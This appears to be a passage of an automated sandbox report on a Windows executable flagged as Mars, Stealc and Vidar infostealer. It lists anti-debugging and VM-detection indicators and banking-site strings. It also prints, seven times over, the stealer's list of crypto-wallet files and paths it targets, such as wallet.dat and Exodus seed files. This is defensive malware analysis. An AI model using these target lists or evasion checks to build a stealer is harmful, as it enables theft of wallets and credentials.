Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: HJDGCGDB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: HJDGCGDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: HJDGCGDB.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: HJDGCGDB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: HJDGCGDB.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: HJDGCGDB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: HJDGCGDB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: HJDGCGDB.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: HJDGCGDB.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: HJDGCGDB.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
Source: HJDGCGDB.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
Source: HJDGCGDB.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: HJDGCGDB.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: HJDGCGDB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\t13pv4ox18.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h] 0_2_00415DC0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00419DC7 SetUnhandledExceptionFilter, 0_2_00419DC7
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417B4E
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004173DD
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C78B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C78B66C
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C78B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C78B1F7
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C93AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C93AC62

HIPS / PFW / Operating System Protection Evasion
barindex
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00415D00
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C78B341 cpuid 0_2_6C78B341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00414570
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\t13pv4ox18.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00414450
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004143C0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004144B0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1985985133.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2439993808.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: t13pv4ox18.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1985985133.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2439993808.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: t13pv4ox18.exe PID: 2788, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
